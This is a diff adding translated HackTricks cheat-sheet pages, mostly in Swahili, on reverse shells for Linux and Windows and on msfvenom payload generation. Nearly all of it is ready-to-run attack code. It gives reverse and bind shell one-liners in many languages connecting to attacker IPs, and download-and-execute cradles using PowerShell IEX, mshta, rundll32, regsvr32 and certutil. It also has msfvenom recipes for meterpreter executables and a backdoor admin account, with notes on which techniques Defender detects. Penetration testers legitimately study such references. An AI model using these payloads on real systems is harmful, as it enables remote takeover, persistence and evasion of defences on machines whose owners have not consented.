+``` +## Python +```bash +#Linux +export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' +#IPv6 +python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");' +``` +## Perl +```bash +perl -e 'use 
Socket;$i="";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## PHP +```php +// Using 'exec' is the most common method, but assumes that the file descriptor will be 3. +// Using this method may lead to instances where the connection reaches out to the listener and then closes. +php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' + +// Using 'proc_open' makes no assumptions about what the file descriptor will be. +// See https://security.stackexchange.com/a/198944 for more information +$sock, 1=>$sock, 2=>$sock), $pipes); ?> + +/dev/tcp/10.10.14.8/4444 0>&1'"); ?> +``` +## Java +```bash +r = Runtime.getRuntime() +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p.waitFor() +``` +## Ncat +```bash +victim> ncat --ssl -c "bash -i 2>&1" +attacker> ncat -l --ssl +``` +## Golang +```bash +echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go +``` +## Lua +```bash +#Linux +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" +#Windows & Linux +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); 
while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## NodeJS +```javascript +(function(){ +var net = require("net"), +cp = require("child_process"), +sh = cp.spawn("/bin/sh", []); +var client = new net.Socket(); +client.connect(8080, "10.17.26.64", function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +}); +return /a/; // Prevents the Node.js application form crashing +})(); + + +or + +require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') +require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'") + +or + +-var x = global.process.mainModule.require +-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') + +or + +// If you get to the constructor of a function you can define and execute another function inside a string +"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() +"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")() + + +or + +// Abuse this syntax to get a reverse shell +var fs = this.process.binding('fs'); +var fs = process.binding('fs'); + +or + +https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py +``` +## OpenSSL + +Mshambuliaji (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Mtu Aliyeathiriwa +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## 
**Socat** + +[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) + +### Bind shell +```bash +victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane +attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 +``` +### Reverse shell +```bash +attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 +victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane +``` +## Awk +```bash +awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +``` +## Kidole + +**Mshambuliaji** +```bash +while true; do nc -l 79; done +``` +Ili kutuma amri, iandike, bonyeza enter na bonyeza CTRL+D (kuacha STDIN) + +**Victim** +```bash +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null')`; sleep 1; done + +export X=Connected; while true; do X=`eval $(finger "$X"@ 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done +``` +## Gawk +```bash +#!/usr/bin/gawk -f + +BEGIN { +Port = 8080 +Prompt = "bkd> " + +Service = "/inet/tcp/" Port "/0/0" +while (1) { +do { +printf Prompt |& Service +Service |& getline cmd +if (cmd) { +while ((cmd |& getline) > 0) +print $0 |& Service +close(cmd) +} +} while (cmd != "exit") +close(Service) +} +} +``` +## Xterm + +Hii itajaribu kuungana na mfumo wako kwenye bandari 6001: +```bash +xterm -display 10.0.0.1:1 +``` +Ili kupata reverse shell unaweza kutumia (ambayo itasikiliza kwenye bandari 6001): +```bash +# Authorize host +xhost +targetip +# Listen +Xnest :1 +``` +## Groovy + +by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) KUMBUKA: Java reverse shell pia inafanya kazi kwa Groovy +```bash +String host="localhost"; +int port=8044; +String cmd="cmd.exe"; +Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), 
si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); +``` +## References + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell) +* [https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/](https://tcm1911.github.io/posts/whois-and-finger-reverse-shell/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) + +**Jaribu Kikundi cha Usalama** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +Jifunze & fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze & fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/msfvenom.md b/generic-methodologies-and-resources/reverse-shells/msfvenom.md new file mode 100644 index 000000000..7d7dd4bd9 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/msfvenom.md @@ -0,0 +1,240 @@ +# MSFVenom - CheatSheet + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} + +
+ +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na hunters wa bug bounty! + +**Uelewa wa Hacking**\ +Shiriki na maudhui yanayoangazia msisimko na changamoto za hacking + +**Habari za Hack kwa Wakati Halisi**\ +Baki na habari za hivi punde katika ulimwengu wa hacking kupitia habari na uelewa wa wakati halisi + +**Matangazo ya Hivi Punde**\ +Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa + +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na uanze kushirikiana na hackers bora leo! + +*** + +## Msingi msfvenom + +`msfvenom -p -e -f -i LHOST=` + +Mtu anaweza pia kutumia `-a` kubaini usanifu au `--platform` + +## Orodha +```bash +msfvenom -l payloads #Payloads +msfvenom -l encoders #Encoders +``` +## Paramu za kawaida wakati wa kuunda shellcode +```bash +-b "\x00\x0a\x0d" +-f c +-e x86/shikata_ga_nai -i 5 +EXITFUNC=thread +PrependSetuid=True #Use this to create a shellcode that will execute something with SUID +``` +## **Windows** + +### **Reverse Shell** + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe +``` +{% endcode %} + +### Unda Mtumiaji + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe +``` +{% endcode %} + +### CMD Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe +``` +### **Teua Amri** + +{% code overflow="wrap" %} +```bash +msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f exe > pay.exe +msfvenom -a x86 
--platform Windows -p windows/exec CMD="net localgroup administrators shaun /add" -f exe > pay.exe +``` +### Encoder + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe +``` +{% endcode %} + +### Imejumuishwa ndani ya executable + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe +``` +{% endcode %} + +## Linux Payloads + +### Reverse Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf +msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf +``` +{% endcode %} + +### Bind Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf +``` +### SunOS (Solaris) + +{% code overflow="wrap" %} +```bash +msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf +``` +{% endcode %} + +## **MAC Payloads** + +### **Reverse Shell:** + +{% code overflow="wrap" %} +```bash +msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho +``` +### **Bind Shell** +```bash +msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho +``` +{% endcode %} + +## **Web Based Payloads** + +### **PHP** + +#### Reverse shel**l** +```bash +msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php +cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php +``` +{% endcode %} + +### ASP/x + +#### Reverse shell + +{% code overflow="wrap" %} +```bash +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp +msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) 
LPORT=(Your Port) -f aspx >reverse.aspx +``` +{% endcode %} + +### JSP + +#### Reverse shell + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp +``` +{% endcode %} + +### WAZI + +#### Reverse Shell + +{% code overflow="wrap" %} +```bash +msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +``` +{% endcode %} + +### NodeJS +```bash +msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) +``` +## **Script Language payloads** + +### **Perl** + +{% code overflow="wrap" %} +```bash +msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl +``` +### **Python** +```bash +msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py +``` +### **Bash** +```bash +msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh +``` +{% endcode %} + +
+ +Jiunge na [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty! + +**Uelewa wa Udukuzi**\ +Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi + +**Habari za Udukuzi za Wakati Halisi**\ +Baki na habari za hivi punde katika ulimwengu wa udukuzi kupitia habari na uelewa wa wakati halisi + +**Matangazo ya Hivi Punde**\ +Baki na taarifa kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa + +**Jiunge nasi kwenye** [**Discord**](https://discord.com/invite/N3FrSbmwdy) na anza kushirikiana na hackers bora leo! + +{% hint style="success" %} +Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)! +* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/reverse-shells/windows.md b/generic-methodologies-and-resources/reverse-shells/windows.md new file mode 100644 index 000000000..76470bdc8 --- /dev/null +++ b/generic-methodologies-and-resources/reverse-shells/windows.md @@ -0,0 +1,506 @@ +# Shells - Windows + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +*** + +## Lolbas + +Ukurasa [lolbas-project.github.io](https://lolbas-project.github.io/) ni wa Windows kama [https://gtfobins.github.io/](https://gtfobins.github.io/) ni wa linux.\ +Kwa wazi, **hakuna faili za SUID au ruhusa za sudo katika Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binaries** zinaweza (kutumika) kutekeleza aina fulani ya vitendo visivyotarajiwa kama **kutekeleza msimbo wa kawaida.** + +## NC +```bash +nc.exe -e cmd.exe +``` +## NCAT +mhasiriwa +``` +ncat.exe -e "cmd.exe /c (cmd.exe 2>&1)" +#Encryption to bypass firewall +ncat.exe --ssl -e "cmd.exe /c (cmd.exe 2>&1)" +``` +mshambuliaji +``` +ncat -l +#Encryption to bypass firewall +ncat -l --ssl +``` +## SBD + +**[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat unaoweza kubebeka na salama**. Inafanya kazi kwenye mifumo ya Unix kama na Win32. Ikiwa na vipengele kama vile usimbuaji mzito, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa tena mara kwa mara, sbd inatoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika wa Netcat. 
+```bash +# Victims machine +sbd -l -p 4444 -e bash -v -n +listening on port 4444 + + +# Atackers +sbd 10.10.10.10 4444 +id +uid=0(root) gid=0(root) groups=0(root) +``` +## Python +```bash +#Windows +C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in 
[(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" +``` +## Perl +```bash +perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +## Ruby +```bash +#Windows +ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' +``` +## Lua +```bash +lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +``` +## OpenSSH + +Mshambuliaji (Kali) +```bash +openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here you will be able to introduce the commands +openssl s_server -quiet -key key.pem -cert cert.pem -port #Here yo will be able to get the response +``` +Mtu aliyeathirika +```bash +#Linux +openssl s_client -quiet -connect :|/bin/bash|openssl s_client -quiet -connect : + +#Windows +openssl.exe s_client -quiet -connect :|cmd.exe|openssl s_client -quiet -connect : +``` +## Powershell +```bash +powershell -exec bypass -c "(New-Object 
Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" +powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" +Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" +echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile +``` +Mchakato unaofanya wito wa mtandao: **powershell.exe**\ +Payload imeandikwa kwenye diski: **HAPANA** (_angalau mahali popote ambapo ningeweza kupata kwa kutumia procmon !_ ) +```bash +powershell -exec bypass -f \\webdavserver\folder\payload.ps1 +``` +Mchakato unaofanya wito wa mtandao: **svchost.exe**\ +Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache** + +**Mstari mmoja:** +```bash +$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` +**Pata maelezo zaidi kuhusu Shells tofauti za Powershell mwishoni mwa hati hii** + +## Mshta + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) +``` + +```bash +mshta http://webserver/payload.hta +``` + +```bash +mshta \\webdavserver\folder\payload.hta +``` +#### **Mfano wa hta-psh reverse shell (tumia hta kupakua na kutekeleza PS backdoor)** +```xml + +``` +**Unaweza kupakua na kutekeleza kwa urahisi sana zombie ya Koadic ukitumia stager hta** + +#### 
mfano wa hta + +[**Kutoka hapa**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f) +```xml + + + + + + + + + +``` +#### **mshta - sct** + +[**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + + +``` +#### **Mshta - Metasploit** +```bash +use exploit/windows/misc/hta_server +msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109 +msf exploit(windows/misc/hta_server) > exploit +``` + +```bash +Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit +``` +**Imegunduliwa na mlinzi** + + + + +## **Rundll32** + +[**Mfano wa Dll hello world**](https://github.com/carterjones/hello-world-dll) + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +rundll32 \\webdavserver\folder\payload.dll,entrypoint +``` + +```bash +rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); +``` +**Imegunduliwa na mlinzi** + +**Rundll32 - sct** + +[**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) +```xml + + + + + + + + +``` +#### **Rundll32 - Metasploit** +```bash +use windows/smb/smb_delivery +run +#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 +``` +**Rundll32 - Koadic** +```bash +use stager/js/rundll32_js +set SRVHOST 192.168.1.107 +set ENDPOINT sales +run +#Koadic will tell you what you need to execute inside the victim, it will be something like: +rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); +``` +## Regsvr32 + +* [Kutoka 
hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll +``` + +``` +regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll +``` +**Imepatikana na mlinzi** + +#### Regsvr32 -sct + +[**Kutoka hapa**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) +```markup + + + + + + + + +``` +#### **Regsvr32 - Metasploit** +```bash +use multi/script/web_delivery +set target 3 +set payload windows/meterpreter/reverse/tcp +set lhost 10.2.0.5 +run +#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll +``` +**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager regsvr** + +## Certutil + +* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) + +Pakua B64dll, ikode na uitekeleze. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll +``` +Pakua B64exe, ikode na uiendeshe. 
+```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe +``` +**Imepatikana na mlinzi** + + +## **Cscript/Wscript** +```bash +powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" +``` +**Cscript - Metasploit** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs +``` +**Imepatikana na mlinzi** + +## PS-Bat +```bash +\\webdavserver\folder\batchfile.bat +``` +Mchakato unaofanya wito wa mtandao: **svchost.exe**\ +Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat +impacket-smbserver -smb2support kali `pwd` +``` + +```bash +\\10.8.0.3\kali\shell.bat +``` +**Imepatikana na mlinzi** + +## **MSIExec** + +Mshambuliaji +``` +msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi +python -m SimpleHTTPServer 80 +``` +Mtu aliyeathirika: +``` +victim> msiexec /quiet /i 